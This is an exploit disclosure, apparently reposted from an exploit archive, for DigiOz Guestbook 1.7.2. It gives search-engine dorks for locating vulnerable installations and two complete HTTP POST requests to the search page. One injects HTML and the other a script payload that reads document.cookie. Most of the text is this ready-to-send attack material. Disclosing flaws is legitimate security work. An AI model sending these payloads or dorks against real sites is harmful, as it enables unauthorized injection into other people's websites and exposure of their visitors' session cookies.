facebook facebook twitter rss

DigiOz Guestbook Version 1.7.2 Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 10-06-2013
DigiOz Guestbook Version 1.7.2 Multiple Vulnerabilties
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.digioz.com/
.:. Dork : [1]"DigiOz Guestbook Version 1.7.2"
[2]intitle:"Powered by DigiOz Guestbook Version 1.7.2"
####################################################################

===[ Exploit ]===

Post Html Injection:
====================

POST /search.php HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.site.com/search.php
Cookie: PHPSESSID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
search_term=<h1>INJECTION</h1>


Post Cross-Site Scripting:
==========================

POST /search.php HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.site.com/search.php
Cookie: PHPSESSID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
search_term=<script>alert(document.cookie)</script>

####################################################################

Like us on Facebook :